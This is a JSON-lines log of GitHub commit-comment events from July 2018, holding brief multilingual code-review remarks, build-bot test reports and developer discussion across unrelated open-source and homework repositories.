{"id":"8020837914","type":"CommitCommentEvent","actor":{"login":"liuqun"},"repo":{"name":"liuqun/tensorflow_serving_tools_docker"},"payload":{"comment":{"id":29839571,"position":null,"line":null,"path":null,"commit_id":"111fcbd1675a0018b1ff9b466ada843a25c7f04e","created_at":"2018-07-26T07:09:13Z","updated_at":"2018-07-26T07:09:13Z","author_association":"OWNER","body":"谷歌给的这个tensorflow-serving_1.9.0_all.deb包虽名为all实际上却是amd64架构的:\r\n\r\n`https://storage.googleapis.com/tensorflow-serving-apt/pool/${TF_SERVING_PKGNAME}-${TF_SERVING_VERSION}/t/${TF_SERVING_PKGNAME}/${TF_SERVING_PKGNAME}_${TF_SERVING_VERSION}_all.deb`"}},"created_at":"2018-07-26T07:09:13Z"}
{"id":"8020839034","type":"CommitCommentEvent","actor":{"login":"alex-ab"},"repo":{"name":"alex-ab/genode"},"payload":{"comment":{"id":29839574,"position":null,"line":null,"path":null,"commit_id":"bcd2a2d808b82852b0d0f7911069e758bf44ddd4","created_at":"2018-07-26T07:09:29Z","updated_at":"2018-07-26T07:09:29Z","author_association":"OWNER","body":"@cnuke: please add to you dde_linux_branch (fixes x86_32)"}},"created_at":"2018-07-26T07:09:29Z"}
{"id":"8020840185","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29839577,"position":21,"line":15,"path":"ruby_basics_part_1/quadratic_equation.rb","commit_id":"be3407358b30a21a3d5f1a2bc0876136bca9fe89","created_at":"2018-07-26T07:09:46Z","updated_at":"2018-07-26T07:09:46Z","author_association":"NONE","body":"Вычисление квадратного корня можно вынести в отдельный метод. И сюда уже передавать третьим аругментом не дискриминант, а результат вычисления."}},"created_at":"2018-07-26T07:09:46Z"}
{"id":"8020843220","type":"CommitCommentEvent","actor":{"login":"gneginskiy"},"repo":{"name":"nmice/Task"},"payload":{"comment":{"id":29839590,"position":23,"line":60,"path":"src/main/java/week06/TaskG02_04_ArrayList/ArrayListOwn.java","commit_id":"7b516a46e3847302b6bcd8b2e1a77fc274ab77fd","created_at":"2018-07-26T07:10:32Z","updated_at":"2018-07-26T07:10:32Z","author_association":"COLLABORATOR","body":"remove commented code"}},"created_at":"2018-07-26T07:10:32Z"}
{"id":"8020844536","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29839593,"position":43,"line":32,"path":"ruby_basics_part_1/quadratic_equation.rb","commit_id":"be3407358b30a21a3d5f1a2bc0876136bca9fe89","created_at":"2018-07-26T07:10:50Z","updated_at":"2018-07-26T07:10:50Z","author_association":"NONE","body":"Не нужны пустые строки перед elsif/else"}},"created_at":"2018-07-26T07:10:50Z"}
{"id":"8020844608","type":"CommitCommentEvent","actor":{"login":"mmaechler"},"repo":{"name":"emacs-ess/ESS"},"payload":{"comment":{"id":29839594,"position":null,"line":null,"path":null,"commit_id":"d6d2604364c176234f3391ffa3ff800cc63f27a8","created_at":"2018-07-26T07:10:52Z","updated_at":"2018-07-26T07:10:52Z","author_association":"MEMBER","body":"This is good, thank you.\r\n\r\nJust noted:   compilation of  ess-tracebug.el  still gives the warning that  `caddr` is not defined.\r\nIt does not seem to be part of cl-lib (at least not for Emacs 25.x.y, current on Fedora 26) ... but probably is in emacs 26 (as I see it does not give the warning there)."}},"created_at":"2018-07-26T07:10:52Z"}
{"id":"8020845685","type":"CommitCommentEvent","actor":{"login":"gneginskiy"},"repo":{"name":"nmice/Task"},"payload":{"comment":{"id":29839596,"position":32,"line":40,"path":"src/main/java/week06/TaskG02_04_ArrayList/ArrayListOwnTestDrive.java","commit_id":"7b516a46e3847302b6bcd8b2e1a77fc274ab77fd","created_at":"2018-07-26T07:11:09Z","updated_at":"2018-07-26T07:11:09Z","author_association":"COLLABORATOR","body":"more or less ok. cover the class with test"}},"created_at":"2018-07-26T07:11:09Z"}
{"id":"8020848625","type":"CommitCommentEvent","actor":{"login":"ZeroEpoch1969"},"repo":{"name":"TFPatches/TotalFreedomMod"},"payload":{"comment":{"id":29839602,"position":null,"line":null,"path":null,"commit_id":"7a2b7ec78b4967f49418d64adceb3e380eca2570","created_at":"2018-07-26T07:11:54Z","updated_at":"2018-07-26T07:11:54Z","author_association":"MEMBER","body":"info TFM"}},"created_at":"2018-07-26T07:11:54Z"}
{"id":"8020849349","type":"CommitCommentEvent","actor":{"login":"bluelocate"},"repo":{"name":"vbmania/CountdownTimerTddExam"},"payload":{"comment":{"id":29839604,"position":13,"line":138,"path":"CountdownTimer/CountdownTimerTests/CountdownTimerTests.swift","commit_id":"3cca9431a08ad22fd6baa0a5d462c29c4fd5f4b3","created_at":"2018-07-26T07:12:05Z","updated_at":"2018-07-26T07:12:05Z","author_association":"NONE","body":"혹시 이 부분 false 가 되어야 하는것 아닌가요? start 하면 stopped 상태가 true가 아니지 않나 해서요."}},"created_at":"2018-07-26T07:12:05Z"}
{"id":"8020861962","type":"CommitCommentEvent","actor":{"login":"navv1234"},"repo":{"name":"simulationcraft/simc"},"payload":{"comment":{"id":29839645,"position":null,"line":null,"path":null,"commit_id":"3a1bae2b3457c7234f45d9134d3449cd2c1fe51a","created_at":"2018-07-26T07:15:05Z","updated_at":"2018-07-26T07:15:05Z","author_association":"CONTRIBUTOR","body":"Yeah, a comment here would be nice for future generations for the reasoning."}},"created_at":"2018-07-26T07:15:05Z"}
{"id":"8020863172","type":"CommitCommentEvent","actor":{"login":"nik0"},"repo":{"name":"puddly/Main"},"payload":{"comment":{"id":29839649,"position":null,"line":null,"path":null,"commit_id":"381a48bfcd50dc627c3c190e4c67c281f670fe4b","created_at":"2018-07-26T07:15:23Z","updated_at":"2018-07-26T07:15:23Z","author_association":"NONE","body":"I guess it is possible to get a pointer to the raw image data.\r\nHave a look here: https://github.com/jthwho/defang/blob/4d5afc75bfcc9bdad5b665e5dbfe97ebb2a305ed/build/.support/libimp/sample-Snap-Raw.c\r\n\r\nBut I am not sure how to integrate it without interfering with the stream and the jpeg snapshots.\r\nAnd I am not sure also about the resources that are needed for this ...\r\n\r\n"}},"created_at":"2018-07-26T07:15:23Z"}
{"id":"8020864584","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29839650,"position":null,"line":null,"path":null,"commit_id":"a67315d714db773a77cafab9807cc9859c38a74b","created_at":"2018-07-26T07:15:44Z","updated_at":"2018-07-26T07:15:44Z","author_association":"NONE","body":"develop (mjwitte) - i386-Windows-7-VisualStudio-14: OK (2322 of 2322 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a67315d714db773a77cafab9807cc9859c38a74b-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a67315d714db773a77cafab9807cc9859c38a74b-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-26T07:15:44Z"}
{"id":"8020867814","type":"CommitCommentEvent","actor":{"login":"JC1738"},"repo":{"name":"opentable/sous"},"payload":{"comment":{"id":29839664,"position":null,"line":null,"path":null,"commit_id":"0c521521433307b9aa6869dc3d42c09482dd7146","created_at":"2018-07-26T07:16:31Z","updated_at":"2018-07-26T07:16:31Z","author_association":"MEMBER","body":"TeamCity Sous Support :: Sous Tests :: Smoke Tests Nightly (not exlude fail) [Build 52](https://teamcity.otenv.com/viewLog.html?buildId=9006798&buildTypeId=SousSupport_SousTests_SmokeTestsNightlyNotExludeFail) outcome was **FAILURE**\nSummary: Tests failed: 3 (3 new), passed: 40, ignored: 6 Build time: 00:16:07\n### Failed tests\n```\ngithub.com/opentable/sous/test/smoke: TestSmoke: <no details avaliable>\n\ngithub.com/opentable/sous/test/smoke: TestSmoke/db/split/custom-reqid-first-deploy: <no details avaliable>\n\ngithub.com/opentable/sous/test/smoke: TestSmoke/db/split/custom-reqid-second-deploy: <no details avaliable>\n\n```\n"}},"created_at":"2018-07-26T07:16:31Z"}
{"id":"8020871582","type":"CommitCommentEvent","actor":{"login":"shuhei"},"repo":{"name":"shuhei/elm-compiler"},"payload":{"comment":{"id":29839669,"position":27,"line":39,"path":"compiler/src/Parse/Shader.hs","commit_id":"0a635a36b16e1ebdeea33906fe4fb718e40b6630","created_at":"2018-07-26T07:17:27Z","updated_at":"2018-07-26T07:17:27Z","author_association":"OWNER","body":"I can think of two approaches here.\r\n\r\n1. Parse only GLSL source code by `run`ning a parser here (with a fresh State), and adjust error positions like the original `parseSource`.\r\n2. Modify State._terminal to stop GLSL parser at the end of GLSL, put GLSL parser here, and restore State._terminal.\r\n\r\nThe comment here is based on 2). But now I think 1) is better because 2) adds complexity by more State manipulation. We need to be careful not to copy the GLSL source text in 1) though."}},"created_at":"2018-07-26T07:17:27Z"}
{"id":"8020877081","type":"CommitCommentEvent","actor":{"login":"vbmania"},"repo":{"name":"vbmania/CountdownTimerTddExam"},"payload":{"comment":{"id":29839676,"position":13,"line":138,"path":"CountdownTimer/CountdownTimerTests/CountdownTimerTests.swift","commit_id":"3cca9431a08ad22fd6baa0a5d462c29c4fd5f4b3","created_at":"2018-07-26T07:18:48Z","updated_at":"2018-07-26T07:18:48Z","author_association":"OWNER","body":"맞습니다. 하지만 이 단계에서는 start에 대한 테스트 이고, stop의 상태 때문에 start의 테스트가 영향을 받아서는 안 됩니다. 나중에는 말씀하신 대로 변화되는데.. 매 단계가 완전한 논리 상태를 유지하면서 진행되는 것이 아니라 각 상황에서 마치 바둑에서 포석을 놓는 것처럼 자리를 깔고 나아간다고 보시면 될 것 같습니다. 그 과정이 반복되면 테스트는 자연히 더 단단해지더군요."}},"created_at":"2018-07-26T07:18:48Z"}
{"id":"8020882195","type":"CommitCommentEvent","actor":{"login":"KariukiJamesN"},"repo":{"name":"KariukiJamesN/James-One"},"payload":{"comment":{"id":29839681,"position":null,"line":null,"path":null,"commit_id":"e9f726a57417718c96e0f58c6e414daa5fb3015b","created_at":"2018-07-26T07:20:01Z","updated_at":"2018-07-26T07:20:01Z","author_association":"OWNER","body":"Wow!"}},"created_at":"2018-07-26T07:20:01Z"}
{"id":"8020884549","type":"CommitCommentEvent","actor":{"login":"bluelocate"},"repo":{"name":"vbmania/CountdownTimerTddExam"},"payload":{"comment":{"id":29839685,"position":13,"line":138,"path":"CountdownTimer/CountdownTimerTests/CountdownTimerTests.swift","commit_id":"3cca9431a08ad22fd6baa0a5d462c29c4fd5f4b3","created_at":"2018-07-26T07:20:33Z","updated_at":"2018-07-26T07:20:33Z","author_association":"NONE","body":"아~이해했습니다. 감사합니다!! :)"}},"created_at":"2018-07-26T07:20:33Z"}
{"id":"8020890640","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29839699,"position":29,"line":125,"path":"1-Osnovy-Ruby-polnaya-PO/lesson6/interface.rb","commit_id":"28abe27ad4f597627f609a821058babe267c5afb","created_at":"2018-07-26T07:22:01Z","updated_at":"2018-07-26T07:22:01Z","author_association":"OWNER","body":"+"}},"created_at":"2018-07-26T07:22:01Z"}
{"id":"8020890744","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29839701,"position":26,"line":19,"path":"ruby_basics_part_1/quadratic_equation.rb","commit_id":"be3407358b30a21a3d5f1a2bc0876136bca9fe89","created_at":"2018-07-26T07:22:03Z","updated_at":"2018-07-26T07:22:03Z","author_association":"NONE","body":"Не критично, потому-что тут можно было решать без методов, но раз уж мы решили использовать методы, то для расширения кругозора скажу, что этот метод по сути делает тоже самое, что positiv_ и _negativ руты. Я бы в любом из этих методов сделал третьим default аргументом 0. Это значит, что если методу при вызове будет передано 2 аргумента, то он подставит третьим аргументом default аргумент автоматический. И уже при вызове, в том месте, где мы был neutral_root использовал бы positiv_root c двумя аргументами. Вот пример работы дефолтных аргументов\r\n```\r\ndef sum(a, b = 5)\r\n   a + b\r\nend\r\n\r\nsum(10) # => 15\r\nsum(10, 30) # => 40\r\n```"}},"created_at":"2018-07-26T07:22:03Z"}
{"id":"8020891583","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29839707,"position":17,"line":113,"path":"1-Osnovy-Ruby-polnaya-PO/lesson6/interface.rb","commit_id":"28abe27ad4f597627f609a821058babe267c5afb","created_at":"2018-07-26T07:22:15Z","updated_at":"2018-07-26T07:22:15Z","author_association":"OWNER","body":"horosho "}},"created_at":"2018-07-26T07:22:15Z"}
{"id":"8020892300","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29839710,"position":29,"line":125,"path":"1-Osnovy-Ruby-polnaya-PO/lesson6/interface.rb","commit_id":"28abe27ad4f597627f609a821058babe267c5afb","created_at":"2018-07-26T07:22:26Z","updated_at":"2018-07-26T07:22:26Z","author_association":"OWNER","body":"+"}},"created_at":"2018-07-26T07:22:26Z"}
{"id":"8020894171","type":"CommitCommentEvent","actor":{"login":"Seiph59"},"repo":{"name":"Seiph59/Pharmacie"},"payload":{"comment":{"id":29839714,"position":21,"line":30,"path":"Pharmacie.py","commit_id":"8a04d343c89e1361b86ba6a6836ebfef6859ecb6","created_at":"2018-07-26T07:22:53Z","updated_at":"2018-07-26T07:22:53Z","author_association":"OWNER","body":"Créer une classe unique pour générer un graphique en prenant en paramètre le nom du médicament, pour que celui-ci traite les données selon le médicament sélectionné."}},"created_at":"2018-07-26T07:22:53Z"}
{"id":"8020894914","type":"CommitCommentEvent","actor":{"login":"Giowi"},"repo":{"name":"voria/samsung-tools"},"payload":{"comment":{"id":29839717,"position":null,"line":null,"path":null,"commit_id":"10fd47c8048e87b7c07930fccc4d258c35d68e63","created_at":"2018-07-26T07:23:03Z","updated_at":"2018-07-26T07:23:03Z","author_association":"NONE","body":"It doesn't work on lubuntu 18.04 64bit for samsung n150 plus"}},"created_at":"2018-07-26T07:23:03Z"}
{"id":"8020895674","type":"CommitCommentEvent","actor":{"login":"DrRSatzteil"},"repo":{"name":"DrRSatzteil/documentmanager"},"payload":{"comment":{"id":29839722,"position":11,"line":9,"path":"lib/Database/OrganisationMapper.php","commit_id":"ce66e5c0b5e41177c5d46cf71b812f42c0ed80e6","created_at":"2018-07-26T07:23:15Z","updated_at":"2018-07-26T07:23:15Z","author_association":"OWNER","body":"You’re right...\r\n\r\nI got really confused by this thread: https://github.com/nextcloud/documentation/issues/537 and this one https://help.nextcloud.com/t/app-development-broken-could-not-resolve-error-variable-name-mixed-with-class/18816/13\r\nwhere it was stated that the IDbConnection class was deprecated and should be replaced by OC\\DB\\Connection. So far I don’t have any problems with the IDbConnection so I guess I should stick to that."}},"created_at":"2018-07-26T07:23:15Z"}
{"id":"8020922894","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29839775,"position":9,"line":11,"path":"ruby_basics_part_1/right-angled_triangle.rb","commit_id":"0507096fcd142af805b3a74f4f8f09b1277aaa87","created_at":"2018-07-26T07:29:28Z","updated_at":"2018-07-26T07:29:28Z","author_association":"NONE","body":"Не самое хорошее название для аргумента. Когда я вижу такое название, то расчитваю, что внутри будет объект треугольника. Мне пришлось идти в то, место где этот метод вызывается и смотртеть, что туда отправляется. На самом деле, там массив сторон. Так-что переменную нужно было назвать sides - это показывает, что у нас там коллекция сторон"}},"created_at":"2018-07-26T07:29:28Z"}
{"id":"8020925634","type":"CommitCommentEvent","actor":{"login":"MegaMaer"},"repo":{"name":"MegaMaer/AMD-Intership"},"payload":{"comment":{"id":29839779,"position":5,"line":22,"path":"CookApp/Cook.Repository/Repository.cs","commit_id":"ab5d122e2b020f11a55f45fecbc15cfa55ff0327","created_at":"2018-07-26T07:30:03Z","updated_at":"2018-07-26T07:30:03Z","author_association":"OWNER","body":"fix + interface "}},"created_at":"2018-07-26T07:30:03Z"}
{"id":"8020931344","type":"CommitCommentEvent","actor":{"login":"ajblane"},"repo":{"name":"ajblane/dcurl"},"payload":{"comment":{"id":29839791,"position":4,"line":18,"path":"src/dcurl.c","commit_id":"0100646d2d101bb7142e33996c4ffe6ed6a53c49","created_at":"2018-07-26T07:31:21Z","updated_at":"2018-07-26T07:31:21Z","author_association":"OWNER","body":"check for a4d25e6e5ed87d84b2c19c158b3fd18573432507"}},"created_at":"2018-07-26T07:31:21Z"}
{"id":"8020932104","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"Jekaa/Stockfish"},"payload":{"comment":{"id":29839792,"position":null,"line":null,"path":null,"commit_id":"de5ab6df47e9d0e522cccba1035a3b0258140f29","created_at":"2018-07-26T07:31:33Z","updated_at":"2018-07-26T07:31:33Z","author_association":"NONE","body":"I'am sure this will fail because x-ray attacks are important. But who knows."}},"created_at":"2018-07-26T07:31:33Z"}
{"id":"8020937178","type":"CommitCommentEvent","actor":{"login":"esolitos"},"repo":{"name":"sequelpro/sequelpro"},"payload":{"comment":{"id":29839804,"position":null,"line":null,"path":null,"commit_id":"c541d630ac2e57dcafb2ae15c99cfa3a6e84cfee","created_at":"2018-07-26T07:32:42Z","updated_at":"2018-07-26T07:32:42Z","author_association":"NONE","body":"@dmoagx Is there a reason i'm not seeing behind this change?\r\nAFAIK Tower is still a good software, why removing it?"}},"created_at":"2018-07-26T07:32:42Z"}
{"id":"8020937822","type":"CommitCommentEvent","actor":{"login":"utkuozbulak"},"repo":{"name":"ugent-korea/pytorch-unet-segmentation"},"payload":{"comment":{"id":29839806,"position":4,"line":290,"path":"src/augmentation.py","commit_id":"8b917e227e6aace11cc59802ccf9eacb1b21cc16","created_at":"2018-07-26T07:32:51Z","updated_at":"2018-07-26T07:32:51Z","author_association":"MEMBER","body":"#Blame"}},"created_at":"2018-07-26T07:32:51Z"}
{"id":"8020938783","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29839808,"position":40,"line":38,"path":"ruby_basics_part_1/right-angled_triangle.rb","commit_id":"0507096fcd142af805b3a74f4f8f09b1277aaa87","created_at":"2018-07-26T07:33:04Z","updated_at":"2018-07-26T07:33:04Z","author_association":"NONE","body":"Лишняя аьстракция. Можно было в иф стэйтмэнте ниже сразу писать `if triangle_error`"}},"created_at":"2018-07-26T07:33:04Z"}
{"id":"8020941406","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29839812,"position":13,"line":35,"path":"subprojects/docs/src/docs/userguide/working_with_files.adoc","commit_id":"135ac7bd3cfe91b57d2a2e4ed759e2af29b6ea45","created_at":"2018-07-26T07:33:40Z","updated_at":"2018-07-26T07:33:40Z","author_association":"CONTRIBUTOR","body":"Have italics been removed from all titles? I guess I'm OK with this as long as all references to titles are links."}},"created_at":"2018-07-26T07:33:40Z"}
{"id":"8020941536","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29839813,"position":46,"line":42,"path":"ruby_basics_part_1/right-angled_triangle.rb","commit_id":"0507096fcd142af805b3a74f4f8f09b1277aaa87","created_at":"2018-07-26T07:33:42Z","updated_at":"2018-07-26T07:33:42Z","author_association":"NONE","body":"Тут нужен exit, потому-что после return выполнение программы продолжится"}},"created_at":"2018-07-26T07:33:42Z"}
{"id":"8020944841","type":"CommitCommentEvent","actor":{"login":"JonathanHallam"},"repo":{"name":"alphagov/seal"},"payload":{"comment":{"id":29839818,"position":null,"line":null,"path":null,"commit_id":"c55e12b8b0210e5271ff57d5f682ca9ab2e41228","created_at":"2018-07-26T07:34:25Z","updated_at":"2018-07-26T07:34:25Z","author_association":"NONE","body":":'( "}},"created_at":"2018-07-26T07:34:25Z"}
{"id":"8020950003","type":"CommitCommentEvent","actor":{"login":"harishkrupo"},"repo":{"name":"intel/IA-Hardware-Composer"},"payload":{"comment":{"id":29839826,"position":null,"line":null,"path":null,"commit_id":"50392d730d1fed8d12c625437a28f79deb1b3171","created_at":"2018-07-26T07:35:37Z","updated_at":"2018-07-26T07:35:37Z","author_association":"CONTRIBUTOR","body":"@js0701 the previous if conditions were wrong, thus the change.\r\nWith the current condition, two rects are considered nonintersecting when the leftmost rect's right coordinate is smaller than the right most rect's left coordinate.\r\nThis applies for top and bottom too."}},"created_at":"2018-07-26T07:35:37Z"}
{"id":"8020950490","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29839827,"position":53,"line":49,"path":"ruby_basics_part_1/right-angled_triangle.rb","commit_id":"0507096fcd142af805b3a74f4f8f09b1277aaa87","created_at":"2018-07-26T07:35:44Z","updated_at":"2018-07-26T07:35:44Z","author_association":"NONE","body":"проверку на равносторонность можно вынести выше, что-б не усложнять условие тут. Если она вернет правду - то прекратить выполнение программы."}},"created_at":"2018-07-26T07:35:44Z"}
{"id":"8020951198","type":"CommitCommentEvent","actor":{"login":"tuifei2018"},"repo":{"name":"e282486518/yii2-console-migration"},"payload":{"comment":{"id":29839828,"position":3,"line":6,"path":"composer.json","commit_id":"9b2547ab8f70b623c2d0c8527b5d9efb6fd5e9af","created_at":"2018-07-26T07:35:54Z","updated_at":"2018-07-26T07:35:54Z","author_association":"NONE","body":"t"}},"created_at":"2018-07-26T07:35:54Z"}
{"id":"8020951900","type":"CommitCommentEvent","actor":{"login":"tuifei2018"},"repo":{"name":"e282486518/yii2-console-migration"},"payload":{"comment":{"id":29839832,"position":3,"line":6,"path":"composer.json","commit_id":"9b2547ab8f70b623c2d0c8527b5d9efb6fd5e9af","created_at":"2018-07-26T07:36:05Z","updated_at":"2018-07-26T07:36:05Z","author_association":"NONE","body":"ty"}},"created_at":"2018-07-26T07:36:05Z"}
{"id":"8020952759","type":"CommitCommentEvent","actor":{"login":"tuifei2018"},"repo":{"name":"e282486518/yii2-console-migration"},"payload":{"comment":{"id":29839833,"position":null,"line":null,"path":null,"commit_id":"9b2547ab8f70b623c2d0c8527b5d9efb6fd5e9af","created_at":"2018-07-26T07:36:17Z","updated_at":"2018-07-26T07:36:17Z","author_association":"NONE","body":"hh"}},"created_at":"2018-07-26T07:36:17Z"}
{"id":"8020953467","type":"CommitCommentEvent","actor":{"login":"tuifei2018"},"repo":{"name":"e282486518/yii2-console-migration"},"payload":{"comment":{"id":29839836,"position":5,"line":65,"path":"WebAction.php","commit_id":"9b2547ab8f70b623c2d0c8527b5d9efb6fd5e9af","created_at":"2018-07-26T07:36:27Z","updated_at":"2018-07-26T07:36:27Z","author_association":"NONE","body":"h"}},"created_at":"2018-07-26T07:36:27Z"}
{"id":"8020958776","type":"CommitCommentEvent","actor":{"login":"MegaMaer"},"repo":{"name":"MegaMaer/AMD-Intership"},"payload":{"comment":{"id":29839841,"position":30,"line":30,"path":"CookApp/Cook.Domain/Recipe.cs","commit_id":"5942f4883c60022287bca7f4fd21257e059e9b6b","created_at":"2018-07-26T07:37:39Z","updated_at":"2018-07-26T07:37:39Z","author_association":"OWNER","body":"оно там уже есть"}},"created_at":"2018-07-26T07:37:39Z"}
{"id":"8020959611","type":"CommitCommentEvent","actor":{"login":"garyee"},"repo":{"name":"garyee/historienpfad"},"payload":{"comment":{"id":29839842,"position":4,"line":11,"path":"historienpfad/src/components/google-map/google-map.ts","commit_id":"a7fa204568dd8335cd0e6f08132eed8f126b7609","created_at":"2018-07-26T07:37:51Z","updated_at":"2018-07-26T07:37:51Z","author_association":"OWNER","body":"This is breaking the system!"}},"created_at":"2018-07-26T07:37:51Z"}
{"id":"8020959878","type":"CommitCommentEvent","actor":{"login":"MegaMaer"},"repo":{"name":"MegaMaer/AMD-Intership"},"payload":{"comment":{"id":29839843,"position":13,"line":13,"path":"CookApp/Cook.Domain/User.cs","commit_id":"5942f4883c60022287bca7f4fd21257e059e9b6b","created_at":"2018-07-26T07:37:55Z","updated_at":"2018-07-26T07:37:55Z","author_association":"OWNER","body":"что-то убрал"}},"created_at":"2018-07-26T07:37:55Z"}
{"id":"8020960223","type":"CommitCommentEvent","actor":{"login":"appleboy"},"repo":{"name":"ooni/sysadmin"},"payload":{"comment":{"id":29839845,"position":null,"line":null,"path":null,"commit_id":"9a28fc864c1f3d8eb30bb8ef305c885bfaf40ad3","created_at":"2018-07-26T07:38:00Z","updated_at":"2018-07-26T07:38:00Z","author_association":"NONE","body":"LGTM 👍 "}},"created_at":"2018-07-26T07:38:00Z"}
{"id":"8020966034","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29839855,"position":55,"line":51,"path":"ruby_basics_part_1/right-angled_triangle.rb","commit_id":"0507096fcd142af805b3a74f4f8f09b1277aaa87","created_at":"2018-07-26T07:39:17Z","updated_at":"2018-07-26T07:39:17Z","author_association":"NONE","body":"тут нужно решить без вложенных условий. Перенеси is_isosceles в 49 строку после is_right_angled"}},"created_at":"2018-07-26T07:39:17Z"}
{"id":"8020968195","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29839861,"position":56,"line":52,"path":"ruby_basics_part_1/right-angled_triangle.rb","commit_id":"0507096fcd142af805b3a74f4f8f09b1277aaa87","created_at":"2018-07-26T07:39:47Z","updated_at":"2018-07-26T07:39:47Z","author_association":"NONE","body":"Тут не нужна пустая строка"}},"created_at":"2018-07-26T07:39:47Z"}
{"id":"8020975387","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29839870,"position":5,"line":15,"path":"1-Osnovy-Ruby-polnaya-PO/lesson6/station.rb","commit_id":"28abe27ad4f597627f609a821058babe267c5afb","created_at":"2018-07-26T07:40:33Z","updated_at":"2018-07-26T07:40:33Z","author_association":"OWNER","body":"+"}},"created_at":"2018-07-26T07:40:33Z"}
{"id":"8020975833","type":"CommitCommentEvent","actor":{"login":"lokeshbv"},"repo":{"name":"Samsung/TizenRT"},"payload":{"comment":{"id":29839872,"position":null,"line":null,"path":null,"commit_id":"290d7786681ac3ec41cf373f5c4d107fe9f48f8c","created_at":"2018-07-26T07:40:37Z","updated_at":"2018-07-26T07:40:37Z","author_association":"CONTRIBUTOR","body":"But, In 10.5% of packet loss, 0.5 % is not significant right!we don't know whether it specifies half packet loss or 1 packet or more.\r\nAnd in Linux machine, ping % packet loss output format is an integer.\r\n"}},"created_at":"2018-07-26T07:40:37Z"}
{"id":"8020981802","type":"CommitCommentEvent","actor":{"login":"antuosuoji"},"repo":{"name":"antuosuoji/myqianqianbody"},"payload":{"comment":{"id":29839878,"position":1,"line":1,"path":"README.md","commit_id":"c1cf6bf9f8eb1076edab3add50646683b483f035","created_at":"2018-07-26T07:41:48Z","updated_at":"2018-07-26T07:41:48Z","author_association":"OWNER","body":"当前的完全"}},"created_at":"2018-07-26T07:41:48Z"}
{"id":"8020982688","type":"CommitCommentEvent","actor":{"login":"antuosuoji"},"repo":{"name":"antuosuoji/myqianqianbody"},"payload":{"comment":{"id":29839880,"position":4,"line":3,"path":"README.md","commit_id":"c1cf6bf9f8eb1076edab3add50646683b483f035","created_at":"2018-07-26T07:42:00Z","updated_at":"2018-07-26T07:42:00Z","author_association":"OWNER","body":"的气味的气味"}},"created_at":"2018-07-26T07:42:00Z"}
{"id":"8020982850","type":"CommitCommentEvent","actor":{"login":"TobiasMeister"},"repo":{"name":"DerSiR/GablerLog"},"payload":{"comment":{"id":29839881,"position":null,"line":null,"path":null,"commit_id":"5ed0f77b5cd7cc071104c8f1644a6ab5b7c3132f","created_at":"2018-07-26T07:42:03Z","updated_at":"2018-07-26T07:42:03Z","author_association":"MEMBER","body":"Test comment"}},"created_at":"2018-07-26T07:42:03Z"}
{"id":"8020987690","type":"CommitCommentEvent","actor":{"login":"Seiph59"},"repo":{"name":"Seiph59/Pharmacie"},"payload":{"comment":{"id":29839891,"position":78,"line":132,"path":"Pharmacie.py","commit_id":"8a04d343c89e1361b86ba6a6836ebfef6859ecb6","created_at":"2018-07-26T07:43:08Z","updated_at":"2018-07-26T07:43:08Z","author_association":"OWNER","body":"Changement suite à la mise en place du nouvel attribut de classe \"Historique\""}},"created_at":"2018-07-26T07:43:08Z"}
{"id":"8020988172","type":"CommitCommentEvent","actor":{"login":"xificurk"},"repo":{"name":"pepakriz/phpstan-exception-rules"},"payload":{"comment":{"id":29839892,"position":null,"line":null,"path":null,"commit_id":"461c803a7aa1a4b7303c6bd43c533d83c72a1de6","created_at":"2018-07-26T07:43:15Z","updated_at":"2018-07-26T07:43:15Z","author_association":"NONE","body":"Thanks a lot for the explanation. I think the blacklist you've described should solve most of the common use cases, I'll try to find some time and send you PR."}},"created_at":"2018-07-26T07:43:15Z"}
